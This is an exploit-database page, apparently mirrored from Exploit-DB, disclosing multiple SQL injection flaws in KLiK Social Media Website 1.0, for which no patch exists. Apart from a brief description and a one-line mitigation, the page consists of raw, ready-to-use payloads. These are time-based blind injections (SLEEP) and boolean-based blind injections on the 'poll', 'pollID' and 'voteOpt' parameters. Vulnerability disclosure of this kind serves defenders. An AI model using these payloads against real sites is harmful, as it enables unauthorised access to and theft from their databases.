header-logo
Suggest Exploit
vendor:
KLiK Social Media Website
by:
corpse
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: KLiK Social Media Website
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:msaad1999:kliksocialmediawebsite
Metasploit:
Other Scripts:
Platforms Tested: Debian 11
2022

KLiK Social Media Website 1.0 – ‘Multiple’ SQLi

KLiK Social Media Website 1.0 is vulnerable to multiple SQL injection attacks. Attackers can exploit the 'poll' (GET) parameter with a time-based blind payload, the 'pollID' (POST) parameter with a boolean-based blind payload, and the 'voteOpt' (POST) parameter with a boolean-based blind payload. All of these payloads can be used to gain access to the underlying database.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi
# Date: April 1st, 2022
# Exploit Author: corpse
# Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Version: 1.0
# Tested on: Debian 11

Parameter: poll (GET)
    Type: time-based blind
    Title: MySQL time-based blind - Parameter replace (ELT)
    Payload: poll=ELT(1079=1079,SLEEP(5))

Parameter: pollID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)

Parameter: voteOpt (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15

Navigation

Suggest Exploit

Services By CQR